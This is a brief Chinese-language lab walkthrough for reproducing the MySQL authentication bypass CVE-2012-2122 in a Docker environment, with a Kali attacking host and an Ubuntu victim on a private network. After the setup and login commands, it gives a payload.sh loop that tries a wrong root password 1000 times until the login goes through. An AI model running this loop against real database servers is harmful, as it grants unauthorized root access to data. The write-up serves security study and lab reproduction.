Mysql 身份认证绕过漏洞(CVE-2012-2122)
搭建环境
主机准备
准备两台主机,
一台ubuntu(192.168.12.137),一台kail,均处于同一内网环境下。
其中kail作为攻击主机,ubuntu作为受害主机。
环境搭建
进入目录环境
执行如下命令:
docker-compose up -d
环境启动成功
尝试攻击
先使用正确的密码登录看看是否成功启动环境
在kail主机的命令行输入命令
mysql -h 192.168.12.137 -u root -p123456 -P3306
写如下shell脚本,并执行。
payload.sh
for i in `seq 1 1000`; do mysql -uroot -pwrong -h 192.168.12.137 -P3306 ; done
命令行执行
bash payload.sh
利用成功
